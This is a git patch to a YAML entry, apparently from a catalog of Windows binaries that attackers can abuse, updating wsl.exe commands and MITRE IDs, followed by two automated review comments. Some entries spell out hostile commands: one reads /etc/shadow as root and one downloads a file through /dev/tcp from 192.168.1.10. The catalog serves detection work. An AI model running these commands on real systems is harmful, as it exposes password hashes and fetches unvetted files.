From 03b527b10539dacc793624210cbc2272f135b4ea Mon Sep 17 00:00:00 2001 From: unrooted Date: Fri, 7 Jun 2024 00:42:25 +0200 Subject: [PATCH] Update wsl.exe description (#378) Co-authored-by: Wietze --- yml/OtherMSBinaries/Wsl.yml | 22 ++++++++-------------- 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index e1a5bda..e1493d1 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml 
@@ -10,35 +10,28 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --exec bash -c 'cat file' - Description: Cats /etc/shadow file as root + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + - Command: wsl.exe --exec bash -c "" + Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --system calc.exe - Description: Execute the command as root - Usecase: Performs execution of arbitrary Linux commands as root without need for password. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 11 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file Category: Download Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + MitreID: T1105 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Full_Path: - Path: C:\Windows\System32\wsl.exe Code_Sample: @@ -59,3 +52,4 @@ Acknowledgement: Handle: '@d1r4c' - Person: Nasreddine Bencherchali Handle: '@nas_bench' + - Person: Konrad 'unrooted' Klawikowski
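Review bot: In the rewritten third entry of the first Wsl.yml hunk, the Command reads `wsl.exe --exec bash -c ""` and the Description mentions `-u ` and `-d ` with nothing after either flag, so as shown the entry has no placeholder for the command, the user or the distro. Put a named placeholder in each of the three positions so the entry is readable and so detection authors can see which arguments vary. The same hunk also deletes the `wsl.exe --system calc.exe` entry (the only one listed for Windows 11 alone), while the subject line says only "Update wsl.exe description"; the reason for dropping it should be stated in the commit message. The MitreID change to T1105 touches only the Download entry, which matches its Category.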
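Review bot: In the Acknowledgement hunk, the added `- Person: Konrad 'unrooted' Klawikowski` entry has no `Handle:` line, while the two entries visible above it each pair `Person` with a `Handle`. If the project's schema check expects both keys, add a Handle here, or confirm the field is optional before merging.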